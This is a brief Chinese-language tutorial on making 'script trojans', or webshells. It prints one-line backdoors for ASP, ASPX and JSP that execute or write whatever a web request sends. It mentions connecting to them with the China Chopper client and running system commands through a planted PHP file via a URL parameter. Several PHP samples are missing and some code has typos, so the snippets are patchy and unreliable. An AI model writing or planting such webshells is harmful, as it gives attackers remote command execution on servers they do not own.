脚本木马的制作与原理

webshell（web后门）

一、一句话木马

短小精悍，功能强大，隐蔽性好。

<%
execute request("value")
%>

说明：
使用request的话，post和get两中方式传来的数据都可以接受。

execute用来执行客户端传来的数据。

代码本身没有危害，关键在于我们传输的数据是什么。

常见写法

asp一句话木马

<%eval request("c")%>

php一句话木马

aspx一句话木马

<%@ Page Language="Jscript"%>
<%eval(Request.ltem["value"])%>

jsp一句话木马

< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

利用中国菜刀进行连接
这边我用phpstudy做演示，需要把一句话木马文件放在网站根目录。

一句话木马内容为

可以手动获取信息

我们把一句话木马内容改成

这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前，需要重置下缓存。
在浏览器输入

http://localhost/123.php?xx=ipconfig

执行系统命令

图片木马的制作

上传到服务器后不能直接执行，得想办法改成脚本格式或者在特定环境下以脚本运行

一句话使用技巧

二、小马、大马

还有其他木马，如打包马、脱裤马等等